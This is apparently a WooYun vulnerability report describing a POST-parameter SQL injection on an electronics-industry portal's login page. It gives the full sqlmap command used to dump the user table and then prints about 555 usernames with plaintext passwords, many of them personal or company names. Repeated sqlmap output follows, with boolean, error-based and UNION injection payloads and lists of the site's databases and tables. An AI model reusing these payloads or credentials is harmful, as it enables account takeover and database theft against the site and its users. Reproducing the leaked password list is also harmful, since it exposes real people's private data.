当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151754

漏洞标题:中电网某处存在POST型SQL注射漏洞(65个表/大量用户明文密码泄露可登录)

相关厂商:中电网

漏洞作者: 路人甲

提交时间:2015-11-04 15:53

修复时间:2015-12-21 15:18

公开时间:2015-12-21 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

中电网是中国领先的电子行业门户网,致力于为中国电子工程师提供“一站式”服务。
中电网提供的服务包括:电子行业新闻、最新产品和技术信息、解决方案、设计应用文章、在线座谈、在线培训、电子百科、技术论坛、样品快递、现场及网上研讨会等。
在中电网,电子工程师不仅可以及时获得业内最新的热点新闻和技术信息,还可以参加在线座谈,直接与技术厂商互动交流;通过在线培训充实知识、提高技能;并可以通过中电网的样品快递服务获得样品和开发套件;中电网也是中国最热的电子工程师社区。
中电网按技术门类对网站内容作了详尽的分类,查找方便快捷。中电网还重点建设了“嵌入式系统”等十几个热点技术频道,深受广大电子工程师的欢迎。
中电网成立于2000年,目前的注册电子工程师会员超过45万人,企业会员12,000多家,用户群涵盖通信、消费电子、计算机与外围设备、工控与自动化、汽车电子、广播电视、航天、军工等诸多领域。

详细说明:

地址:http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp

python sqlmap.py -u "http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp" --form -p id --technique=BEQU --random-agent --batch -D chinaecnet -T usertable -C name,password --dump


Database: chinaecnet
Table: usertable
[555 entries]
+-----------------+--------------+
| name            | password     |
+-----------------+--------------+
| 007             | 6661860      |
| 111             | 111          |
| 123             | 123          |
| 1234            | 1234         |
| 444444444444    | 444          |
| 749             | 749888       |
| 8206788         | 8206788      |
| 8884            | 4536         |
| 89533           | 89533        |
| 9898            | 9898         |
| aabb            | aabb         |
| abcd            | 7788         |
| AC POWER CORP.  | 24415921     |
| adam627         | wbh628       |
| adqliang        | 336403       |
| agencyoem       | 6968693      |
| alex-zhang      | 756839       |
| amazon          | 506628       |
| amos            | 730312       |
| amos73          | 730312       |
| ansse           | ansse        |
| ANSSEZHHOU      | ANSSE        |
| aoe0495         | 700116       |
| apricot         | zhigang      |
| as              | av           |
| asdf            | 741008       |
| asiancyber      | asiancyber   |
| aut             | 87321041     |
| b2btest         | b2btest      |
| b2btestlqf      | b2btestlqf   |
| banker08        | 961208       |
| bbell chung     | 760811       |
| bbgui           | bbliking     |
| beck            | 1104         |
| BEILIN          | 317496       |
| beiyue          | 88088        |
| ben             | 120          |
| bjbeilin        | ch1113       |
| bjgps           | 80485        |
| bjsales         | bjsales      |
| bjxwj           | xwj1218      |
| blzkgs          | pengtao      |
| bmw             | bmw          |
| bngong          | 700211       |
| bohai           | bohai        |
| btx             | 1234         |
| buaaczj         | 123456       |
| bwm             | puli         |
| bxhost          | bxhost123    |
| bxhost123       | bxhost123    |
| carrie9         | 404414       |
| CATHAY          | 225578       |
| cbit            | ls           |
| ccyu            | pzmiao123    |
| cdtm            | cdtm9988     |
| cent            | shcent       |
| cf2000          | cf2000       |
| chanda          | 197012       |
| chasten         | 1518         |
| chen            | 731027       |
| chengjg         | shuichuan    |
| chenjain        | chenjian     |
| chenjian        | chenjian     |
| chentie         | 7315         |
| chenwendong     | 740400       |
| chenwenyuan     | 970804       |
| chenwy          | 970804       |
| chenxin813      | 314159       |
| chiec           | chiec        |
| chinab2b        | runforest    |
| chinaysj        | config       |
| chongde wang    | 700813       |
| chs             | chschs       |
| cjb             | bjc          |
| cjb1212         | 681212       |
| cjb681212       | 681212       |
| cjj             | 965140       |
| cjj965140       | 965140       |
| CTHXY           | 22222        |
| cuifeng         | 7873801      |
| DDD             | 222          |
| Dee             | 12160817     |
| dengyong        | dy1          |
| dingjf          | arrow        |
| dlham           | bg2tah       |
| doer            | doer         |
| donghai         | 1220         |
| dongzi2000      | 6596239      |
| DTT             | 1019         |
| dushi           | 7872062      |
| dxy1            | wbclj        |
| dyksl           | 740413       |
| dyxp            | 512627       |
| ED              | hello        |
| ednamoon        | ednamoon     |
| et.et           | 58008419     |
| fan             | fan          |
| fareast         | xiaolai123   |
| fareast63       | xiaolai123   |
| fay             | yi.or        |
| fchh            | 827915       |
| ferfect         | xghaa        |
| fgm             | zwglw163zh   |
| FLY_WHY         | 076126       |
| fsdhc           | fsdhclw      |
| fuchuan         | flower30     |
| fy519           | hzyqcai      |
| Ge Deqi         | 770309       |
| gentle          | millex206    |
| gipsy           | 1            |
| GLW             | 19520630     |
| greatway        | gw44123      |
| gst             | lookman      |
| gsthkchina      | coco         |
| gychen          | 554108       |
| gzaut           | 87321041     |
| hailong         | *1973#       |
| hanmze          | 920035       |
| HAODE           | bcksa        |
| happyxiaoyue    | 770627       |
| harke           | hzhhzh       |
| harry           | 123123       |
| haventchen      | 95157051     |
| hawkmiao        | 70847084     |
| hectorlui       | hectorlui    |
| HEDAWEI         | MONEY        |
| hello           | loveyou      |
| henry           | gw44123      |
| hetong          | protel       |
| hezhichun       | 8246127      |
| HFWMX           | DZBSSYJS     |
| Hit             | 1976121      |
| hix             | 7862678      |
| hjjydx          | 123          |
| hjx             | 7862678      |
| hlqin           | hua6001      |
| htc             | 13586        |
| huang           | 1234         |
| Huang Xiao Yang | straight     |
| huanghb         | 12720333     |
| huangyaonb      | 20031        |
| huangyuefen     | 770627       |
| huifeng         | 730915       |
| hunter          | 6510         |
| huyongjun17     | 740315       |
| hwh             | 13586        |
| hyb             | 53612652     |
| hyg321          | hyg123       |
| hz              | 781129       |
| ic2000          | hjx          |
| icshop          | wszycj       |
| infogate        | 78920        |
| jackma          | 55555        |
| jackma5         | 55555        |
| jackyu          | 1973         |
| jane            | 1            |
| Javakuang       | 432301       |
| jct             | jctgxd       |
| jebour          | 111111       |
| jerry           | jerry        |
| jerry_yu        | jerry        |
| jiajia          | jiajia       |
| jiangwanli      | dongtinghu   |
| jim_zhang_2001  | 2808         |
| jingxy          | 111168       |
| jjm99           | youling      |
| jkliu2001       | 1            |
| jldq            | 19880808     |
| jmwwq           | 12345        |
| JOHN WANG       | 8334         |
| johnfeng        | 730904       |
| johnwoo         | 741128       |
| js              | JS           |
| jzq1206         | l4wAlMTY     |
| kehu01          | 042800       |
| kenny_lee       | 197072       |
| kent            | 0714         |
| kenweld         | 670225       |
| keqiang         | 362401       |
| keset           | lxcc         |
| langxiang       | gl6880       |
| ld007           | feiyang      |
| LDM             | 700210       |
| ldq             | 1997         |
| ldypipi         | 8062531      |
| ldypipi1999     | 8062531      |
| ledoem          | china        |
| lengyun         | 123456       |
| leo_liao        | diane        |
| Lewis Lu        | WbiA17       |
| lgc             | lgc2000      |
| lhln            | 862541       |
| lhw6608         | hwlhwl       |
| li              | 000          |
| LI HAO          | 862541       |
| li_kang         | 6968693      |
| li8h            | love88       |
| liil            | 9614         |
| lijian          | 221811       |
| likang          | 6968693      |
| lili            | 121          |
| liqian          | 570930       |
| litwh           | wt809        |
| liuchongyu      | 0929         |
| liugan          | windows      |
| LiuJun          | Liu!Jun      |
| liutong         | 5171282      |
| liuxiaoming     | 1            |
| liuxq           | bit54        |
| lixuehai        | llxxhh       |
| liyongfu        | 5899702      |
| lizhou hou      | faked        |
| lqf             | lqflqflqf    |
| lsd             | denying      |
| ltj             | 11111        |
| ltz             | 616918       |
| luihooyin       | lhy          |
| lumu            | 81961372     |
| lushi           | 930312       |
| luxiaoqiang     | 711116       |
| luxinduo        | 0717         |
| LWJ             | 000923       |
| lxiaoq          | bit54        |
| lxq968          | llxdqh       |
| lxwwhj          | 661011       |
| LY              | 7761         |
| lzh0148         | lzhlzh       |
| m98969          | 594198       |
| malei007        | 12345678     |
| mao xing biao   | 790930       |
| martin chen     | 1020         |
| maxwell         | q1o8o4       |
| mcc             | mcc          |
| meetingchina    | 126711       |
| meixiaoyan      | 770530m      |
| mengkaizh       | zh560407     |
| miser           | 111111       |
| mmmmm           | mmmmmm       |
| MOONGIRL        | MOONGIRL     |
| mozhao          | 29138        |
| mqz             | 631208       |
| mrsjy           | SINAsjy7624  |
| mrsjy30         | SINAsjy7624  |
| Nancy Huang     | 741130       |
| Nancy Huang1    | 741130       |
| narada          | 11111111     |
| ndy             | 00000        |
| netong          | protel       |
| nhgxzq          | 171831       |
| nianxing        | nx527910     |
| nihao           | 0428         |
| njtusc          | 939600       |
| njusc           | 939600       |
| nnd             | 111111       |
| nwjt            | wjtt928      |
| oe              | oe           |
| ofs             | ofs111       |
| opt             | syxzopt      |
| paite           | 11223344     |
| pengkung        | 420117       |
| pengtao         | pengtao      |
| pest            | drowssap     |
| pick            | 953458       |
| pjy             | pjy          |
| preset          | lxcc         |
| prince          | 88888888     |
| PTZJ            | 041605       |
| pzh             | hlzeng       |
| qian            | 7747         |
| qinf            | 5466         |
| qkqcp           | 123456       |
| qpqp            | qpqp         |
| qqqq            | 0000         |
| Ranger          | st0501       |
| RangerC         | st0501       |
| realwb          | rayto        |
| redtusk         | redtusk      |
| reset           | lxcc         |
| rilin           | ecghjk08     |
| rl88            | 126711       |
| robin           | 123          |
| rocwang         | 2234         |
| romain          | 856663       |
| sammi.lee       | 0000         |
| sandy           | sandy123     |
| sanping         | sanping      |
| sansitech       | fangang      |
| sdgfht          | 123          |
| SeaSky_Tiger    | 2102767      |
| shenbeilun      | loginlun     |
| shenou          | 8125         |
| shhec           | 3614         |
| shine           | sunshine     |
| shssxwjdqc      | 19761215     |
| skywards        | 362630       |
| smihtc          | smihtc       |
| SONGFANG        | 9001450      |
| srcbj           | q1o8o4       |
| stnwy           | 98718769     |
| stvvv           | 140442       |
| styan           | 197645       |
| suitian         | suitian69    |
| sunstrong       | mly`1963     |
| suyong          | suyong       |
| sxgwepc         | 123456       |
| syksl           | 740413       |
| szhtmy          | 3604131      |
| szhtmyic        | 3604131      |
| szlhd           | 930928       |
| talpov          | 142857       |
| TCZZY           | 7031156      |
| test            | test123      |
| test1           | test123      |
| thomas_sheng    | 007313       |
| tj001           | 471711       |
| tjlouzy         | 720315       |
| Tom             | 19810824     |
| tongweiyun      | 954321       |
| tony            | tony123      |
| tony99          | tony99       |
| Toprun          | Toprunx      |
| Treeman.L       | 84218421     |
| triloop         | 166811       |
| twy             | 500016       |
| twy1            | 500016       |
| tz1208          | 616918       |
| voyager         | yangvoy      |
| w1118           | 118439       |
| wang            | wang         |
| wang1           | 1            |
| wangllei        | 315931       |
| wanglw          | wtyx         |
| wave            | 85321        |
| WB              | 690520       |
| weidejiao       | 7711         |
| wenbin          | 901406       |
| wendy           | 12345        |
| WHJLXW          | 661011       |
| wiler wang      | 13178        |
| winghing-aw     | wh           |
| wingo           | 223344       |
| wj_zou          | zwj0206      |
| wjg             | 123          |
| wjmzh           | 197104       |
| wjmzh1          | 197104       |
| wjq             | 88888888     |
| wjz888          | 5400067      |
| wonser          | 118439       |
| wqx88           | 8074         |
| wsxnet          | w            |
| wuhai           | 12345        |
| wushixiang      | wu           |
| wusx            | www          |
| WUSX2000        | w            |
| wuwq            | 12345        |
| wuwu            | w            |
| wuxil           | nj8013cs     |
| wuxin           | symbol\\/    |
| ww              | 001969       |
| www1234         | 1234         |
| wxhx            | 5226022      |
| wyq             | 680517       |
| wyy727          | wyy123       |
| wzdk            | dk888        |
| xgyaguang       | xgqqq        |
| xia             | xia          |
| xiacait         | xiacait      |
| xiacait0828     | 19761215     |
| xiajianxi       | 750808       |
| xiay            | 753159Wc#4   |
| xidieke         | 123456       |
| xiechaoqun      | 929          |
| XIEXH           | 690311       |
| xj_wang         | wxj204       |
| xnda            | 880518       |
| xufen           | xufen        |
| xuyong          | 0419         |
| xxgang          | 756210       |
| xxt             | 123456       |
| xxxxxxxx        | xxxxxxxx     |
| XXZ             | guokeer      |
| xygwl           | 575883       |
| yaba            | 585858       |
| yaguang         | yaguang      |
| yan jianguo     | yjg          |
| YANG            | XYA123       |
| yang yinb       | yybyyb       |
| yang.ag         | 24415921     |
| yangguang       | 7873801      |
| yangjian        | 24396256     |
| yangxz          | 364062       |
| yanxiongwei     | duoduo       |
| yaozn           | 7873801      |
| yermen          | 62323        |
| yexi            | 939600       |
| yexii           | 939600       |
| yfc             | 2563         |
| yh              | yh           |
| ykkf            | ykkf         |
| ym.zhan         | 1008         |
| yu              | 1973         |
| yuan            | luxer        |
| yufn            | yu0927       |
| Yuguang Yang    | 860911       |
| yuzilong        | 1973         |
| ZABC            | 9812         |
| zgy             | 123456       |
| zhabin          | a0p1p6l4     |
| ZhangCheng      | wenrong1     |
| zhangjiaji      | 8817902      |
| zhangjiaji1     | 8817902      |
| zhangliang      | 345678       |
| zhangqihu       | andy         |
| zhangwei        | 691203       |
| zhangxu         | 921107       |
| zhaoqiuyun      | 1557p        |
| zhhm            | wsk59ga1     |
| zhiqiang        | 8416307      |
| zhou rong       | 1234         |
| zhouwen         | 770218       |
| zhuty           | zhuty        |
| zhxan           | 985569       |
| ZJJSJLDQ        | 19880801     |
| zjkl            | 8880017      |
| zlmzhong        | 741208       |
| ZM74            | 2174136      |
| zpzhk           | 750828       |
| zsh             | zsh3210      |
| zsmc            | king         |
| zsq             | 111222       |
| ZTOUCH          | 6A6A6A       |
| zzhhd           | zzhhd        |
| zzjj777         | 776150       |
| zzlight         | 8617056      |
| 柏俊              | 75219        |
| 宝丰ATI           | YYL68118     |
| 北京市恒威电子系统公司     | zrevek       |
| 北京英辰            | ycdz2000     |
| 北京中软            | RXIC         |
| 步步高电子产品无锡售后服务中心 | 212223       |
| 常戎              | 980922       |
| 陈建军             | 62475893     |
| 陈进杰             | 965140       |
| 陈先生             | friend       |
| 陈晓曙             | 941059       |
| 陈雪              | chen1114     |
| 电子              | okokok       |
| 董春              | 6413372      |
| 付昕军             | 7523         |
| 富历新             | 6413372      |
| 高全胜             | 1963824      |
| 高衍龙             | line         |
| 葛德奇             | 770309       |
| 顾军杰             | 961012       |
| 郭华玲             | 8383734      |
| 汉瞻公司            | hzyqcai      |
| 郝云鹏             | 888          |
| 恒通电脑            | 13586        |
| 胡春来             | 1234         |
| 胡开农             | pass         |
| 胡文              | 7301         |
| 花明渊             | 314159       |
| 华电网             | 12345        |
| 黄继忠             | 123456       |
| 黄晓春             | huang        |
| 京大电脑中心          | 661011       |
| 科瑞达             | 800323       |
| 邝亚凌             | kknd42       |
| 蓝鸥              | 82667550     |
| 廊坊市慧普电子有限公司     | 770925       |
| 李贵荣             | ei41         |
| 李洪亮             | 901554       |
| 李辉              | 1109         |
| 李加荣             | 6269550      |
| 李建堂             | 26774769     |
| 李靖              | 613076       |
| 李军              | 26774769     |
| 李康              | 6968693      |
| 李鹏77            | 761008       |
| 李鹏77216         | 761008       |
| 李文胜             | 123123       |
| 梁峰              | forliang45   |
| 林永生             | 92371        |
| 林永胜             | 92371        |
| 刘湘毅             | lxy          |
| 骆天天             | 123          |
| 马德荣             | 7809         |
| 马立新&科瑞达         | 800323       |
| 马留石             | 127871       |
| 马生              | 594198       |
| 孟祥宾             | 123456       |
| 孟祥宾8            | 123456       |
| 宁波中策电子有限公司      | okokok       |
| 普冠电子            | samli        |
| 奇麗新貿易有限公司       | 5238         |
| 钱飞龙             | 641227       |
| 全军              | 0326         |
| 全哲雄             | quanzx       |
| 阮章莹             | 359888       |
| 赛博电子            | 5617010      |
| 上海岛谷科技有限公司      | 7747         |
| 上能公司            | 123456       |
| 邵国振             | xfjdsgz      |
| 深圳市多和电子技术有限公司   | 396103       |
| 史慧杰             | 888999       |
| 舒海涛             | sht          |
| 宋财华             | ghf423       |
| 宋建才             | songjc       |
| 苏斌              | chinavision  |
| 苏洪端             | 730605       |
| 孙辉              | 681020       |
| 孙志强             | 8416307      |
| 汤家骏             | ustctjj      |
| 唐杰              | tangjie      |
| 唐正兴             | 8828549      |
| 天津磁卡            | aaaaaaaa     |
| 田松              | 5061339      |
| 铁矿              | 0520ch       |
| 王定军             | 2004         |
| 王海龙             | 123          |
| 王海龙123          | 123          |
| 王皓奎             | 1870209      |
| 王继刚             | 961122       |
| 王伟              | 888888       |
| 王新杰             | wxj204       |
| 王耀威             | &WxYlWj!     |
| 王垣平             | 63919        |
| 伟兴科电            | weixing      |
| 无锡华新电子有限公司      | 5226022      |
| 吴晓林             | lookup       |
| 西安三才电子有限公司      | 618          |
| 夏才通             | xiacaitong   |
| 小鱼              | 740126       |
| 邢向前             | 977320       |
| 徐贤伟             | 017713       |
| 许宁              | 6661860      |
| 延光              | 81000        |
| 杨波              | y1b8b6p2     |
| 杨林              | yl1369       |
| 姚美英             | 701223a      |
| 叶晖              | 123123       |
| 伊杨              | asdiad       |
| 由利人             | 1026         |
| 于立军             | 701223a      |
| 詹雨明             | 1008         |
| 张锋              | htxx001      |
| 张惠君             | 307648       |
| 张全              | 171831       |
| 正光公司            | 123          |
| 正华公司            | 28641        |
| 智力科学仪器厂         | 62712778     |
| 中策电子            | okokokwywywy |
| 周华              | 770101       |
| 周江滨             | 610830       |
| 祝英霞             | oio8lo9.     |
+-----------------+--------------+


选取部分用户登陆展示:

1.gif


2.gif

漏洞证明:

---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user:    'ecnetdb'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
database management system users [4]:
[*] BUILTIN\\Administrators
[*] ecnetdb
[*] robin
[*] sa
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [27]:
[*] brand
[*] chinaecnet
[*] COIE
[*] datasheet
[*] demo
[*] E-HUB
[*] EMD
[*] hr
[*] info
[*] Management
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] purchase
[*] sales
[*] seminar_emnet
[*] seminardemo
[*] survey
[*] symposium
[*] TechApp
[*] tempdb
[*] TrainingNew
[*] translation
[*] webservice_st
[*] XilinxGame
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: chinaecnet
[65 tables]
+--------------------------------------+
| Converter_2000.09.17                 |
| Converter_2000.09.17                 |
| Cat_GTmart2Online                    |
| DataFromAvNet                        |
| DataToAvNet1                         |
| DataToAvNet1                         |
| ExpQuery                             |
| HK_Capital                           |
| HK_Carton                            |
| HK_Packing                           |
| HK_Storage                           |
| Items_Status                         |
| MfgPDFUrl                            |
| Results                              |
| SZ_Capital                           |
| SZ_Carton                            |
| SZ_Packing                           |
| SZ_Storage                           |
| ano_query_items                      |
| ano_quote_items                      |
| basket                               |
| category_bg5                         |
| category_bg5                         |
| ceast                                |
| chinamat                             |
| com_hot_products_bak_data_from_dr_wu |
| com_hot_products_bak_data_from_dr_wu |
| consult                              |
| contract_info_000115                 |
| contract_info_000115                 |
| contract_items_000115                |
| contract_old                         |
| cyfd                                 |
| demo_info                            |
| demo_items                           |
| dtproperties                         |
| gtmart_category_chinaecnet           |
| mytmp                                |
| ordertable                           |
| p_contract                           |
| p_contract                           |
| po_info                              |
| po_items                             |
| pro_gtmart2online                    |
| products                             |
| query_info                           |
| query_items                          |
| quote_info                           |
| quote_info                           |
| quote_items                          |
| result_info                          |
| sample_basket                        |
| sample_basket                        |
| sample_dept                          |
| sample_product                       |
| subusertable                         |
| sysconstraints                       |
| syssegments                          |
| test_basket                          |
| userinfo                             |
| usertable                            |
| v_commfg                             |
| v_compnb                             |
| v_hotmfg                             |
| v_hotpnb                             |
+--------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
